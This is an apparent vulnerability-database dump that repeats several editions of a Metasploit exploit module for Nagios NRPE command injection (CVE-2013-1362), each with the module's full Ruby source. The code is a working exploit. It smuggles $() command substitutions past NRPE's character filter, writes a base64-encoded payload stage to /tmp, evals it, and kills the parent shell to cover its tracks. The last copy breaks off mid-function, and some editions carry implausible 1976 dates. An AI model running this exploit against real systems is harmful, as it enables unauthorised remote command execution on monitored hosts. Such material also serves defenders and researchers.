to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-05T06:13:17", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-05T20:14:23", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-05T20:14:23"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-05T20:14:23", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-05T22:14:58", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-05T22:14:58"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-05T22:14:58", "differentElements": ["modified", "published"], "edition": 33}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-06T20:15:10", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-06T20:15:10"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-06T20:15:10", "differentElements": ["modified", "published"], "edition": 34}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-06T22:15:15", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-06T22:15:15"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n 